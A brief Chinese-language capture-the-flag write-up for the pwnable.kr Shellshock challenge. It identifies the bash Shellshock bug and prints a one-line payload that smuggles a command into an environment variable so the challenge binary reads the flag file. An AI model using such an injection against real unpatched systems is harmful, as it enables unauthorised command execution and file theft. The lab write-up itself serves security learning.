pwnable.kr #shellshock
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)
看到題目標題已經有頭緒了,是bash shellshock漏洞的題目,進到題目主機後查看原始碼:
1 |
|
果然是得利用Shellshock來構造payload,Shellshock的payload非常簡單:
1 | $ env a='() { :;}; /bin/cat flag' ./shellshock |
Shellshock的細節可以參考 維基百科